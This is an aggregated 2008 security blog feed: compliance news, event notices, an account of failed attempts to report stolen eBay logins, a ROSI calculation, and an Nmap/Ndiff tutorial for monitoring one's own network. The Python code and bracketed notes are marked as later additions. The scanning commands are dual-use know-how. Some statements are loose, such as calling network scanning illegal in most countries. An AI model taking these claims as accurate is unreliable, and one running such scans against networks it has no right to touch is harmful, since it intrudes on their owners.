Thursday, October 16, 2008

Spliced feed for Security Bloggers Network

Belgium didn't implement European anti-money-laundering rules [belsec] [Belgian Security Blognetwork]

Posted: 16 Oct 2008 06:52 AM CDT

The European Commission has decided to refer Belgium, Ireland, Spain and Sweden to the European Court of Justice over non-implementation of the 3rd Anti-Money Laundering Directive. The transposition deadline for the Directive was 15 December 2007.

The Third Anti-Money Laundering Directive adopted in 2005 builds on existing EU legislation and incorporates into EU law the June 2003 revision of the Forty Recommendations of the Financial Action Task Force (FATF), the international standard-setter in the fight against money laundering and terrorist financing.

The Directive tightens the EU anti-money laundering regime currently applicable to the financial sector as well as lawyers, notaries, accountants, real estate agents and casinos. The scope of the Directive is broadened also to encompass trust and company service providers as well as all providers of goods, when payments are made in cash in excess of €15.000. In addition, the Directive requires the application of the anti-money laundering tools (identification and verification of customers' identity, record keeping, training of personnel, etc.) to the fight against terrorist financing.

The Directive introduces additional requirements and safeguards for situations of higher risk (e.g. trading with correspondent banks situated outside the EU).

The latest information on infringement proceedings concerning all Member States can be found at:

Identity Management: L-Sec Event 20th November [belsec] [Belgian Security Blognetwork]

Posted: 16 Oct 2008 06:12 AM CDT

Presentations from the European conference on the Internet of Things (RFID), 6/7 October 08 [belsec] [Belgian Security Blognetwork]

Posted: 16 Oct 2008 05:38 AM CDT

SOA security: interesting working group in the UK [belsec] [Belgian Security Blognetwork]

Posted: 16 Oct 2008 05:16 AM CDT

Because in Belgium such things seem to take some time before getting started, we look wherever we can find them.

SOA is not a disease (even if some security analysts will find it disrupts their security infrastructure the way a disease does) but stands for Service Oriented Architecture, in which business services like databases interact with each other immediately and give the customer an integrated response, without the need to go to several databases and integrate the responses himself. This all looks very nice on paper, but how can you promise the same user that all those databases communicating with each other in real time are so secure that no hacker/crimecracker is hopping from one server to another (going with the flow)?

There is a working group in the UK that tries to put together guidelines, standards and norms to effectively secure this. The industry has made this job quite difficult by building different solutions with different standards and different approaches, so independent research seems the only way forward.

The working document is here

The wiki about SOA security is here

And yes, they are more focused on UK law and US standards, but if you are part of an international group, these will be the laws and standards you will have to follow anyway (as there is nothing legal or standard around here).

27 November London International workshop on Privacy Enhancing Technologies [belsec] [Belgian Security Blognetwork]

Posted: 16 Oct 2008 05:02 AM CDT

You are invited to attend Europe's foremost independent seminar on privacy technologies in London on the 27th of November to discuss the growing success of privacy enhancing technologies (PETs) in modern society.

The aim of this year's event is to demonstrate the reality of how PETs work - to discuss the barriers that are being overcome, the barriers that remain, and to share best practice that can facilitate further successful PET implementations.

Organised by four of the UK's Knowledge Transfer Networks (KTN), A Fine Balance 2008 pushes the agenda of this international privacy debate further than ever before. A morning of presentations will include speakers across Europe including representatives from IBM Research, Microsoft EMEA, the Information Security Awareness Forum (ISAF) and the UK Department for Transport.

The afternoon will comprise a series of chaired working sessions, each focusing on different areas related to securing the success of PETs in action. They will discuss and recommend areas for development, as well as isolating examples of best practice that could increase the number of successful implementations.

Speakers and panellists include:

The Earl of Errol - House of Lords

Jan Camenisch - IBM Research

Caspar Bowden - Chief Security Officer, Microsoft EMEA

Professor Brian Collins - Chief Scientific Advisor, Department for Transport

David King - Chair of the Information Security Awareness Forum (ISAF)

Mike Hawkes - Director for Security, Mobile Data Association

Attendance, including lunch and refreshments, is £75+VAT at the early bird rate, rising to £95+VAT on 30th September.

We are interested in slides or reporting :)

London 6 & 7th November conference about the Insider Threat [belsec] [Belgian Security Blognetwork]

Posted: 16 Oct 2008 04:53 AM CDT

'The Malicious Exploitation of Information Systems Countering the Rise of Insider Threat'

Leading speakers from Europe and the US will attend the event, which will include insights from a former fraudster on issues such as sabotage, profiling offenders and the psychology of offenders. Confirmed speakers so far include Laurence Mulley from the Serious Organised Crime Agency (SOCA); Shari Lawrence Pfleeger from the RAND Corporation; Robert Coles from Merrill Lynch; Clive Blackwell from the Information
Security Group, Royal Holloway, University of London; and Peter Sommer from the London School of Economics.

Topics covered at the conference include:
· how to conduct digital insider threat forensic investigations
· effective use of post-insider threat incident analysis
· improving security processes to avoid security threats
· detecting malicious insider threat from behaviour patterns

6th-7th November at UCL in London, please call Catherine Baker on: 0116 222 5550, or email:

Will probably interest the banking industry in these hard times.

We are interested in slides :)

The Little Black Book of Security [ - A Revolution is the Solution]

Posted: 16 Oct 2008 04:31 AM CDT

When I found this pile of eBay logins circulating around the Net, I did what any security person does in such a situation - ask around for "contacts at company x", so I could get them the data. However, this was going to take a good few hours, so in the meantime I could indulge in one of my favourite pastimes.

See, I do have lots of security connections at different companies and people who can GET me the contacts I need, but I always make a point of going through "standard" channels first, just to remind myself what it's actually like for a regular web user who finds something that shouldn't be out there.

More often than not, it just reminds me that most methods of reporting illegal activity are fundamentally broken.

What's alarming is that if it hadn't been me - or some other security person who'd found this data...if it was some regular web-user who didn't have that support structure to fall back on...this data would probably still be lying around online for people to use and abuse as they see fit.

I won't bore you with all the details, but I started off by calling the Paypal phone number. This predictably ended in disaster, because you have to login to Paypal and be assigned a unique reference number. The operator at the other end couldn't understand that the problem had nothing to do with my own account (though he did spend about five minutes telling me all the security procedures he was going to deploy on my account to prevent any further fraud, which is nice of him if somewhat misplaced).

Later that day, I went through a procession of vaguely hopeless "support staff" on EBay Live Chat. I demanded some kind of dedicated support team EMail address due to the severity of the problem - I think it was support guy number two who gave me an email address, eventually. Hooray! A dedicated, no-nonsense address to get things sorted out.

Then I Googled it, and upon seeing the second entry down rolled my eyes. In for the long haul, baby....

I think it was the day after this (or maybe the day after that) that I tried one more time.

Dispensing with the first Live Support guy thrown in my general direction, I was put through to someone on the "Security Team". After finding out this person couldn't help me either, I was suddenly dumped into a chat with what I can only assume was the Final Boss of the Internet - or at least, the top dog, crap-we're-running-out-of-support-staff King of Live Support Security Team Guy.

The below webchat is 100% genuine, and I have screenshots to prove it (though I've removed some unnecessary text, typos and other junk). You may blink, rub your eyes and slap yourself in the face a couple of times while reading it.

This is entirely natural.

Just imagine that I'm not a security researcher - I'm a regular web user, who just found 5,000+ logins and I really, really want to get this to someone who can do something about it.

That's all.

Now watch it go horribly wrong.

3:03:27 PM System
Connected with A
3:03:32 PM A: Hello and thank you for contacting Account Security Live Help, my name is A. Please give me a moment to review what you have already typed.
3:06:33 PM A: Thank you for patiently waiting, based on what I just read, you want to report a stolen eBay account, am I correct?

3:07:19 PM Paperghost: To be accurate: five thousand, five hundred and thirty four stolen accounts

3:08:23 PM A: I see, thank you for taking the time to report this issue. I will be reviewing it shortly. For future reports you wish to make, please use our webform:


It will reduce any possible wait time in our chat sessions and also ensure that the information is sent to the correct team so they can review it in a more timely manner.

3:09:00 PM Paperghost: You want me to paste five thousand, five hundred and thirty four ebay username and passwords into a contact us form?
3:09:14 PM Paperghost: isn't there an email address that works that i can just send it to?

3:10:53 PM A: You can use the link that I just provided you and below that there is "EMAIL US" link where you can send or paste those names.
3:11:43 PM A: Please separate it with a space in between them.

3:14:14 PM Paperghost: that contact form page wants me to paste in each username one at a time - there are over five thousand usernames in a word document. that contact form has a limit of 10,000 characters. the sum total of the stolen data comprises 243,347 words including spaces. It isn't physically possible for me to send it to you via that form

3:16:49 PM A: Sorry but that is the only link for us to report an account that was taken over by unauthorized third party.

3:17:56 PM Paperghost: Well I have over five thousand stolen accounts here that need to be reported so someone is going to have to find me an email address I can send an email with a word document attached to it to

3:23:15 PM A: What I am going to do is to report all the users that you have and report it to our Trust and Safety team, if you don't mind, typing all those member's in our chat window.
3:24:26 PM A: As I check on the link that I just provide you, you can separate all those name by putting a comma on it.

3:24:38 PM Paperghost: How am I supposed to type more than five thousand usernames into a chat window? You realise most of the account owners will be retired or deceased by the time I finish typing?

3:25:55 PM A: As I check on the link that I just provide you, you can separate all those name by putting a comma on it.
3:26:10 PM A: Just copy and paste it on the username.

3:28:18 PM Paperghost: The word document I have has one username per line, and there are more than five thousand lines of text in the document. it would take me about six months non-stop typing to cut and paste each name from the document then paste it into this chat box

3:29:25 PM A: I have an alternative link for you to report those members, just copy those name and paste in on the link below:


3:31:08 PM Paperghost: That page is not going to accept five thousand lines of userdata submitted to it - and even if it did, i'm not sending all those usernames and passwords via a standard http:// page
3:31:25 PM Paperghost: you realise i could send you the whole thing via email in three seconds and bam, its done

3:32:06 PM A: That is an alternative link that connects you to our Trust and Safety team.

3:33:55 PM Paperghost: your trust and safety team must have an email address i can send this information to, this is crazy
3:37:57 PM Paperghost: what option do i pick on the drop down menu
3:38:05 PM Paperghost: as none of them are applicable as these arent my accounts
3:38:43 PM Paperghost: never mind, i tried it and it crashed my browser.

3:39:19 PM A: First drop down is misuse of eBay -> report a user.

3:42:05 PM Paperghost: as i said, unfortunately it crashes my browser. i don't think the form is designed to handle that much text

3:42:48 PM A: How about sending 100 username at a time?

3:44:12 PM Paperghost: there are FIVE THOUSAND usernames on there. do you have any idea how long that is going to take?

3:45:02 PM A: I do apologize but that is the only way.
If you want you can try sending that at

3:45:28 PM Paperghost: i've already sent it to twice. is there someone there who can check if theres a mail there from xxxxxxxxxxx

A: Yes we have a designated department that handles those mails, and once they have receive it they will immediately review before sending a respond to you.

3:48:44 PM Paperghost: Yes but can someone at least confirm its in that departments mailbox even if they don't open it up
3:49:10 PM Paperghost: I'm trying to help you reclaim five thousand stolen ebay accounts here and it doesn't seem to be going very well

3:49:40 PM A: As much as I want to help you with that, I don't have the necessary tools to check on the mailbox.

3:50:56 PM Paperghost: and nobody there is able to contact anyone from that team to check if its there?

3:52:21 PM A: Don't worry since you already forwarded an email, what we can advise is to please wait for an email confirmation in regards to the investigations.
3:53:24 PM Paperghost: Okay
3:53:45 PM A: I do understand your concern. And we thank you also for taking your time reporting those members.
3:53:49 PM Paperghost: Thanks
3:54:16 PM A: You're very much welcome and thank you for using eBay, I hope you have a great day.


As it turns out, I was (eventually) sent a reply from the EMail address I was given by one of the support people. It said:

"Dear eBay member,

Thanks for your email. We want to help resolve any problems with your
account as quickly as possible.

The fastest way for us to help you is through Live Help, where you can
have a one-on-one chat with one of our customer service agents. The chat
happens right in your web browser, so you don't need any special

Please let the chat agent know that you already sent us an email, as
that will help us speed things along.

We won't receive any replies to this email, so please contact Live Help
for further assistance."

You couldn't make it up.

Of course, all of this was kind of irrelevant - the wheels were already in motion behind the scenes, and I'd consulted the Little Black Book of Security. Because of that, the data had already been passed on to the people it needed to go to, despite the frontline support boobery, and I'd been assured it was being sorted out.

But again - if I didn't have access to that Black Book....what would have happened to this data? Would it still be sitting online for all and sundry to take what they wanted? Would I be going back into Live Chat in an endless cycle of utterly pointless attempts to get someone to do something about it?

Sad to say, but based on the evidence above - quite probably.

It's kind of amazing that such a basic thing - look, here's some fraud and I want you to fix it - can't get past the brick wall that is frontline customer support.

And also kind of depressing. No....make that alarming. Actually, make that puzzling.

No....come to think of it, make it all of the above.

And then some.

Job Opportunity of Server Architect [Telecom,Security & P2P]

Posted: 16 Oct 2008 01:50 AM CDT

There is a good job opportunity in our organization. If you are interested or have friends to recommend, please don't hesitate to contact me by sending the CV/resume to my email address (richard.zhaol at gmail dot com).

Job Description:

This is a senior technical position in the Global Infrastructure Department, under the CIO organization. This is an individual contributor role, reporting directly to the Director of Architect and Security Operations.

1. Lead the global roadmap and technology innovations related to servers, storage and virtualization.
2. Lead the design of the overall architecture and standards for global servers and storage.
3. Communicate with global business users and collect and analyze their requirements.
4. Design the solution to meet the business requirements, with support from SMEs (subject matter experts) from the operation towers.
5. Lead the design and definition of technical manuals and templates used for operational enhancements and changes.


1. Bachelor's degree in Computer Science or Electrical Engineering with very good academic performance (Master/PhD a plus)
2. Minimum 10 years of working experience as an IT operations/consulting engineer/architect, minimum 5 years of IT system design experience, minimum 3 years of large-scale server and storage system design experience
3. Strong technical background in related fields, i.e. networking, telecom and security technologies (ITIL experience is a plus)
4. Good communication skills. Good written/spoken English, able to give technical talks/presentations in English.

Links for 2008-10-15 [] [HiR Information Report]

Posted: 16 Oct 2008 12:00 AM CDT

Links for 2008-10-15 [] [Sicurezza Informatica Made in Italy]

Posted: 16 Oct 2008 12:00 AM CDT

Zero day for Sun Solstice AdminSuite (sadmind) [Security4all] [Belgian Security Blognetwork]

Posted: 15 Oct 2008 07:19 PM CDT

A zero-day disclosure is never a good thing, but people need to be aware when one happens. A vulnerability resides within a function of the Sun Solstice AdminSuite sadmind which, when properly exploited, can lead to remote compromise of the vulnerable system. This information was posted to the Full Disclosure mailing list 2 days ago, together with an exploit for Metasploit.

I checked the Sun security advisories but couldn't find any information (yet). Disable the port or service if you don't need it, or try to shield it if you do. Put an ACL in place. Keep an eye on upcoming advisories for workarounds and patches.


ISACA Event: The changing threat: Targeted Attacks [Security4all] [Belgian Security Blognetwork]

Posted: 15 Oct 2008 07:09 PM CDT

ISACA Belgium is organizing a round table event about "targeted attacks" on Wednesday 29 October at 17:30. This event is free but only accessible for ISACA members.
The Topic:
The threat is always changing, adapting to our defenses. While botnets will remain a serious threat for some time to come, the next generation of attack is already in use. It has been looming just over the horizon for a while, but targeted attacks are being actively used against high value targets. These targeted attacks are a significant shift in tactics of the attackers and as such will require a shift in our protective stance.
The speakers for this session will be:
Mr. Swa Frantzen.
Swa Frantzen holds a Master in Science in Computer Engineering degree, and has worked in the IT and telecommunication sector ever since he graduated in 1990. He always kept a focus on security aspects throughout his career. Swa was involved in numerous roles during his career, ranging from system administrator to CSO. Currently he is an independent security consultant. Swa is active as one of the 35 volunteer handlers at the Internet Storm Center of SANS since 2002.

Miscellaneous: The presentation will be in English. Questions are welcome in Dutch, French and English. Dress is casual. There is no charge for this Round Table.
Notification of Attendance: Please send a mail to, if you plan on attending this RTM (indicating your membership number)!
Location: ULB Campus de la Plaine, Forum Auditorium E, 1050 Brussels
Access plan to the campus : campus/pla_F.html
Targeted attacks are a topic of great interest to me. Word exploits, Grey Pigeon and the like come to mind. I'm kind of disappointed that I won't be able to attend this session, since I'm at RSA Europe that day.

For other interesting security events in and around Belgium, look at the security calendar on the right side of this blog. Upcoming LSEC and OWASP events have been added.


Detailed report on the Georgia Cyberwarfare incident [Security4all] [Belgian Security Blognetwork]

Posted: 15 Oct 2008 06:47 PM CDT

A 29-page report is available for download from or This is probably the most thorough analysis available on the cyberwarfare related to Georgia.

An excerpt:
"In August 2008, cyberwar associated with the Russian Federation struck once more, this time against Georgia. The DDoS attacks began in the weeks running up to the outbreak of the Russian invasion and continued after the Kremlin announced that it had ceased hostilities on August 12th."

ROSI: When is it worth investing in information security? [Sicurezza Informatica Made in Italy]

Posted: 15 Oct 2008 05:36 PM CDT

After a fairly long absence due to work and various projects, we return to the topic of investment in information security.

In the previous post I tried to give an idea of the steps to follow before arriving at a spending budget for information security. An information security consultant can help define the objectives and priorities to pursue, so as not to squander the effectiveness of spending budgets, which in these times are increasingly tight.

In this post I would like to contribute to the discussion on ROI and ROSI in the security field and clear up many of the misbeliefs that unfortunately dominate the sector.

The first question to ask is: does it make sense to talk about ROI for security?
If you want to be a pure economist, certainly not. ROI presupposes a Return, revenue from the investment, which clearly does not exist for spending in favour of greater security and protection.

To clear up any doubt:
While ROI in general presupposes a gain against a cost, ROSI presupposes a saving against a cost.

A security investment (cost) is made to avoid a loss resulting from a successful attack on the company's assets. Cost avoidance. ROSI is positive when the cost is lower than the loss.

This reversal of concepts is what has confused many people in the sector and discouraged many managers anchored to the dogmas of pre-IT economics.

Up to this point it would seem to be only a matter of a change of mentality, whereby, as in the evolution of species, those who can adapt to change survive and the others succumb.

Unfortunately it is not that simple. Before understanding why, you need to have in front of you the formulas involved in calculating ROSI:

For a single risk

SLE = Single Loss Expectancy (loss for a single risk)
AV = Asset Value (economic value of the asset to protect)
EF = Exposure Factor (probability that the risk materialises)

The investment is the cost to be borne to reduce, by a certain percentage, the EF associated with the risk under consideration.
This includes the assumption, correct in my opinion, that no security spending can truly reduce the EF, i.e. the probability that the attack succeeds, to 0.

The security investment aims to reduce the SLE as much as possible by reducing the EF.

A practical example clarifies the concept:

An asset whose value amounts to 1 million euro has a 10% probability of being compromised (EF).

The amount at risk, in monetary terms, is 100,000 euro.
(10% of 1 million euro).

Spending 50,000 euro to bring the EF down to 2%, we would in this case have only 20,000 euro at risk, saving 80,000 euro against an investment of 50,000 euro.
The ROSI at this point is 160%, and our investment of 50,000 has brought the EF down from 10% to 2%, reducing the SLE.
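The calculation above, carried through in code as an added illustration (not from the original post): SLE = AV × EF, the avoided loss is the SLE before minus the SLE after the investment, and ROSI is expressed as the post does, avoided loss divided by cost (80,000 / 50,000 = 160%). Extending it to a list of risks by summing avoided losses and costs, and the second "legacy file share" risk, are assumptions of this example.

```python
"""ROSI worked example following the post's definitions.

Added illustration, not code from the original post. For a single risk:
    SLE     = AV * EF
    savings = SLE_before - SLE_after   (the loss the investment avoids)
    ROSI    = savings / cost           (the post's figure: 80,000 / 50,000 = 160%)
Summing over several risks is an assumption beyond the post's single-risk case.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Risk:
    name: str
    av: float         # AV: asset value, in euro
    ef_before: float  # EF before the investment, a probability in (0, 1]
    ef_after: float   # EF after the investment; never 0, as the post assumes
    cost: float       # cost of the security investment that lowers the EF

    def __post_init__(self):
        # Guard the inputs the post says are hard to estimate: EF must be a
        # probability, the investment can only lower it, and it cannot reach 0.
        if not 0 < self.ef_after <= self.ef_before <= 1:
            raise ValueError(f"{self.name}: need 0 < ef_after <= ef_before <= 1")
        if self.av <= 0 or self.cost <= 0:
            raise ValueError(f"{self.name}: asset value and cost must be positive")

    def sle_before(self) -> float:
        """Single Loss Expectancy with the current exposure: AV * EF."""
        return self.av * self.ef_before

    def sle_after(self) -> float:
        """Single Loss Expectancy once the investment has reduced the EF."""
        return self.av * self.ef_after

    def savings(self) -> float:
        """Loss avoided by the investment (cost avoidance)."""
        return self.sle_before() - self.sle_after()

    def rosi(self) -> float:
        """ROSI as the post states it: avoided loss over cost (1.6 means 160%)."""
        return self.savings() / self.cost

    def pays_off(self) -> bool:
        """The post's criterion: the investment is worth it when cost < avoided loss."""
        return self.cost < self.savings()


def portfolio_rosi(risks) -> float:
    """ROSI over several risks: total avoided loss over total cost (assumed
    extension of the post's single-risk formula)."""
    return sum(r.savings() for r in risks) / sum(r.cost for r in risks)


def rank_by_rosi(risks):
    """Order candidate investments so a limited budget goes to the best ROSI first."""
    return sorted(risks, key=lambda r: r.rosi(), reverse=True)


# The post's example: a 1M euro asset, EF 10% -> 2% for 50,000 euro.
POST_EXAMPLE = Risk("customer database", av=1_000_000, ef_before=0.10,
                    ef_after=0.02, cost=50_000)

# Constructed second candidate: a small saving bought with a large spend.
WEAK_EXAMPLE = Risk("legacy file share", av=200_000, ef_before=0.05,
                    ef_after=0.03, cost=10_000)

if __name__ == "__main__":
    for r in rank_by_rosi([POST_EXAMPLE, WEAK_EXAMPLE]):
        print(f"{r.name}: SLE {r.sle_before():,.0f} -> {r.sle_after():,.0f} euro, "
              f"avoided {r.savings():,.0f}, ROSI {r.rosi():.0%}, pays off: {r.pays_off()}")
    print(f"portfolio ROSI: {portfolio_rosi([POST_EXAMPLE, WEAK_EXAMPLE]):.0%}")
```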

As can be seen from the previous formula, the problems in calculating ROSI are many:
  • The calculation is based on the probability that an event occurs
  • There are no in-depth, reliable statistics on the frequency of events and the incidence of threats
  • Post-disaster costs are partly deterministic and partly random (deterministic as regards the value of the asset to protect, random as regards reputational damage and the related penalties).

In the previous example, the SLE includes costs under the following headings:

  • economic damage (e.g. business continuity)
  • penalties for non-compliance with regulations (think of PCI compliance, or data breach events that lead the privacy supervisory authorities to open a file)
  • reputational damage
  • loss of trade secrets (the cost incurred to reach the project's objectives, handed to competitors)
  • others, depending on the nature and size of the organisation

In light of the preceding observations, does it still make sense to talk about ROSI?
ROSI never appears in financial documents, but it can be useful for deciding the feasibility and convenience of a security investment, whatever the size of the organisation.

Who assigns the values in the SLE formula?

The value of the AV variable is usually assigned by the executive level, which knows the economic value of each company asset better than anyone.

Correct handling of the EF variable is the exclusive task of a security expert, who must know the pre-investment security status and be able to assess the incidence of each threat.

In the next posts I want to expand on the concept of ROI applied to information security.
It is not true that you cannot earn from a security investment. Until next time

Elections Are Done For Me [Emergent Chaos]

Posted: 15 Oct 2008 04:25 PM CDT

I Think I Voted

Forty Percent of California voters are "permanent absentee" voters. Oregon runs entirely by mail-in votes. Other US states have some sort of mail-in or absentee status that people can assign themselves to.

For those people, including me, elections are a slice of time that ends on election day. This isn't new; until relatively recently, it all worked that way. You couldn't expect everyone to be in town on that one day. It is only urbanization that allows us to have elections be an event rather than a process. I sat down last night and waded through the whole mass of offices, measures, and initiatives. I have now completed my civic duty.

This is probably a good idea, as many of the issues with voting and counting votes and securing them have in their model that it has to be done on one day, and as quickly as possible after the polls close. It improves security and accountability to allow and encourage people to vote over an interval of a few weeks.

Asset Management Using Nmap [/dev/random] [Belgian Security Blognetwork]

Posted: 15 Oct 2008 03:31 PM CDT

Nmap is probably the best known and most used open source port scanner on the Internet. I'll explain how to use this wonderful network toolbox to automate a simple asset management solution.

"Know your network!" This is the main focus of this post. Today, having a global and up-to-date overview of network assets is mandatory for all network administrators: new devices are configured or decommissioned, untrusted devices are connected without permission, or users run unsecured servers. Nmap can be used to build a baseline of your network components and to easily report any detected changes.

The baseline will contain all devices (IP addresses) and the services available on them at a given time. By services, I mean here any application listening on a TCP or UDP port. Based on this baseline, we will be able to detect:

  • Newly connected or removed servers
  • Newly configured or stopped services

To detect all changes, I will use a script called "Ndiff". This tool is available in the Nmap SVN repository. Ndiff is a project born during the 2008 Google Summer of Code. Written in Python, it helps compare Nmap scans: it takes two Nmap XML output files and prints the differences between them.

In the next paragraphs, I will assume that you have a running Linux machine with Nmap and Ndiff properly installed. Please refer to the setup documentation if you have questions about their installation. Note that Nmap is a wonderful tool with plenty of options; covering all Nmap features is not the goal here. Please check the Nmap documentation for more information.

Defining the base line

First, we will perform a scan of our network and save the results in an XML file.

Warning: Do not scan a network if you don't have the right to! In most countries, network scanning is an illegal operation. Take care!

Let’s go with the following command:

# nmap -n -oX /root/baseline.xml <your-network>/24

(Replace <your-network>/24 with your own network; the target was missing from the original command.) It will perform a complete scan of the whole class C network and save the result in an XML file. During the scan, useful information will also be printed on the console.

Scheduling the daily scan

We now have an overview of our network. Let's schedule a new network scan via a crontab entry every night (or every hour, week or month, depending on your needs). A crontab entry must be a single line, and <your-network>/24 is a placeholder for your own network:

0 1 * * * (touch /var/run/nmap.running; nmap -n -oX /root/current.xml <your-network>/24 >/dev/null; rm -f /var/run/nmap.running)

As we do not know exactly when the scan will finish, let's create a lock file for the duration of the scan (/var/run/nmap.running). A new XML file will be created with the current network status.

Generating the report

Via a second crontab entry, we now use Ndiff to generate the difference report between the baseline and the current scan results. Then we overwrite the baseline with the latest results. Notice that the presence of the lock file created above is checked to prevent Ndiff from running if the scan is not yet complete. The output of the cron command is sent by e-mail to the network administrator (admin@example.com below is a placeholder for that address):

0 2 * * * (while [ -f /var/run/nmap.running ]; do sleep 5; done; ndiff /root/baseline.xml /root/current.xml | /bin/mail -s "Network Scan" admin@example.com; mv /root/current.xml /root/baseline.xml)

Here are examples of generated reports. The first one detected an unknown SMTP server, which was successfully stopped:

# ndiff /root/baseline.xml /root/current.xml
Wed Oct 15 13:25:02 2008 -> Wed Oct 15 13:25:02 2008
( 25/tcp is closed, was open.

The second one shows a newly detected host and its running services:

# ndiff /root/baseline.xml /root/current.xml
Wed Oct 15 13:50:15 2008 -> Wed Oct 15 21:42:29 2008
Host is up, was unknown.
Add ipv4 address
22/tcp is open.
25/tcp is open.
998 tcp ports are filtered.
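To make the comparison Ndiff performs concrete, here is a small Python re-implementation added as an illustration (it is not Ndiff's own code): it parses two Nmap XML scans and reports new or vanished hosts and port state changes, covering both report types shown above. The two scans, and the addresses 10.0.0.5 and 10.0.0.9 in them, are constructed inline so the script runs offline; for real use, read the files written by "nmap -oX".

```python
"""Ndiff-style comparison of two Nmap XML scans (added illustration, not Ndiff)."""
import xml.etree.ElementTree as ET

# Constructed baseline: one host answering on SSH and SMTP, everything else filtered.
BASELINE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" startstr="Wed Oct 15 13:25:02 2008">
  <host><status state="up"/><address addr="10.0.0.5" addrtype="ipv4"/>
    <ports><extraports state="filtered" count="998"/>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh"/></port>
      <port protocol="tcp" portid="25"><state state="open"/><service name="smtp"/></port>
    </ports></host>
</nmaprun>"""

# Constructed current scan: the SMTP daemon was stopped and a new host appeared.
CURRENT_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" startstr="Wed Oct 15 21:42:29 2008">
  <host><status state="up"/><address addr="10.0.0.5" addrtype="ipv4"/>
    <ports><extraports state="filtered" count="998"/>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh"/></port>
      <port protocol="tcp" portid="25"><state state="closed"/><service name="smtp"/></port>
    </ports></host>
  <host><status state="up"/><address addr="10.0.0.9" addrtype="ipv4"/>
    <ports><extraports state="filtered" count="999"/>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh"/></port>
    </ports></host>
</nmaprun>"""


def parse_scan(xml_text):
    """Return {ipv4: {"state": host state, "default": state of unlisted ports,
    "ports": {(proto, port): state}}} from an Nmap XML document."""
    hosts = {}
    for host in ET.fromstring(xml_text).findall("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        status = host.find("status")
        extra = host.find("ports/extraports")
        entry = {
            "state": status.get("state") if status is not None else "unknown",
            "default": extra.get("state") if extra is not None else "unknown",
            "ports": {},
        }
        for port in host.findall("ports/port"):
            key = (port.get("protocol"), int(port.get("portid")))
            entry["ports"][key] = port.find("state").get("state")
        hosts[addr.get("addr")] = entry
    return hosts


def _ip_key(addr):
    return tuple(int(octet) for octet in addr.split("."))


def diff_scans(baseline, current):
    """List human-readable changes, in the spirit of Ndiff's report lines."""
    changes = []
    for addr in sorted(set(baseline) | set(current), key=_ip_key):
        old, new = baseline.get(addr), current.get(addr)
        if old is None:                      # host seen for the first time
            changes.append(f"{addr}: host is {new['state']}, was unknown.")
            for (proto, port), state in sorted(new["ports"].items()):
                changes.append(f"{addr}: {port}/{proto} is {state}.")
            continue
        if new is None:                      # host vanished from the scan
            changes.append(f"{addr}: host is unknown, was {old['state']}.")
            continue
        if old["state"] != new["state"]:
            changes.append(f"{addr}: host is {new['state']}, was {old['state']}.")
        # A port absent from one side is in that scan's "extraports" state.
        for proto, port in sorted(set(old["ports"]) | set(new["ports"])):
            before = old["ports"].get((proto, port), old["default"])
            after = new["ports"].get((proto, port), new["default"])
            if before != after:
                changes.append(f"{addr}: {port}/{proto} is {after}, was {before}.")
    return changes


def report(baseline_xml, current_xml):
    """Compare two scans given as XML text; an empty list means no change."""
    return diff_scans(parse_scan(baseline_xml), parse_scan(current_xml))


if __name__ == "__main__":
    print("\n".join(report(BASELINE_XML, CURRENT_XML)) or "no changes")
```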

What’s next?

The Nmap/Ndiff combination will help you detect changes on your network(s). This can be helpful for deploying monitoring of newly detected services. It can also help to detect potential security breaches. However, this solution is not a vulnerability scanner (like Nessus or OpenVAS)! It is a free and reliable way to increase your network security. Why hesitate?

Server Hardening - Getting Back To Basics [Digital Bond]

Posted: 15 Oct 2008 02:18 PM CDT

If you are responsible for defending networks and systems, you have many different tools at your disposal (unfortunately so do the attackers). There are many products on the market, from firewalls to intrusion detection/prevention systems, that aim to protect your valuable resources. There are also many host-based products, such as host-based intrusion prevention systems and anti-virus software which live directly on the host and protect your systems from harm. Don’t get me wrong, I believe that all of these defensive measures are fantastic and you must use them in a layered approach to secure your networks and systems.

However, the one defensive layer that cannot be overlooked is system hardening (this was all we had before all the fancy defensive tools). This means going through your settings, permissions and other configuration parameters, without third-party tools, to ensure that the system is secure. I believe this is something that, from a defensive perspective, some have overlooked or forgotten about completely. This is why I am excited to be working on the Bandolier project, which was created to develop Nessus audit files to help harden control system application components (see Jason Holcomb's postings for more information).

To start, I've been going through some of the various system hardening standards and guidelines, trying to find which ones work best. I've found several great resources in this area which I want to share:

The nice part is that the commercial version of Nessus gives you access to audit files that can test your systems against all of the above standards. A great example of how the audit files actually work, and tests for a flaw that I am particularly fond of exploiting, is the Tenable blog posting on Auditing Windows 2003 Servers for Disabled USB Drives and AutoRun CD-ROM.

So what exactly does this mean? [StillSecure, After All These Years]

Posted: 15 Oct 2008 02:17 PM CDT

". . . and Cisco NAC support is extended to cover all NAC versions, protecting the network from infected guest hosts." Beats the heck out of me.  It is in the last line of F-Secure's press release about their new endpoint agent/suite (when did we get to the point that an agent and a suite are interchangeable anyhow?).  It comes right before the "about F-Secure" paragraph. Is it the proverbial catch all? Do they really support all NAC versions? All versions of Cisco NAC? How? Did they just want to hit all of the buzzwords?  They were sure to mention my boy Hoff's new buzzword, "the cloud". But show me an AV vendor who isn't checking the cloud these days.  The cloud is the new black.

Guys, if you are going to mention something you do in your press release, at least explain it so people know what you are talking about. Also, why be the 15th AV vendor to announce what you do in the cloud and make it seem like you're unique? Why not just say, "we are doing what everyone else is doing"? Of course you could say you did it first, you do it better, yours is bigger or faster, etc. Hey, I guess size does matter. But talk about me-too releases. Come on.

Presentation on Optimizing Your Logging for Insider Attack Tracking [Anton Chuvakin Blog - "Security Warrior"]

Posted: 15 Oct 2008 01:11 PM CDT

OK, I [well, my blogspot scheduler, rather :-)] am releasing another fun presentation that I've been "hoarding" for a while to keep my readers "entertained" while I am enjoying Siberia.

This presentation is about using logs for tracking insiders, as well as about "insider-proofing" your logs and making them more useful for that purpose.

It is also embedded below:

Logs vs Insiders



Using flashy slide transitions can kill your presentation [Security4all] [Belgian Security Blognetwork]

Posted: 15 Oct 2008 12:28 PM CDT

